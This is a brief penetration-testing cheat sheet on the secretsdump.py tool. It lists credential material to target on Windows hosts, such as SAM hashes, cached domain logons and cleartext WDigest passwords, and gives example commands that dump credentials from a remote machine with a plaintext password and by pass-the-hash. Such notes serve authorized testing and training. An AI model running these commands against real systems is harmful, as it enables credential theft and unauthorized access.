SecretsDump

Introduction

Important Information to look for:

SAM Hashes: Administrator account, Any other user.
Cached domain logon information.
Passwords can also be seen in clear text if there are services that are running that stores password in the registry.
Wdigest - Wdigest enables password to be stored in clear text. Enabled by default on Windows 7, 8, Server 2008 R2, Server 2012.

Syntax: secretsdump.py [Domain]/[Username]:['password']@[IP]

secretsdump.py ALT/jjones:'buyme_200sx'@172.16.1.5

Syntax: secretsdump.py [Local Username]@[IP] -hashes [Hash]

secretsdump.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Last updated 6 months ago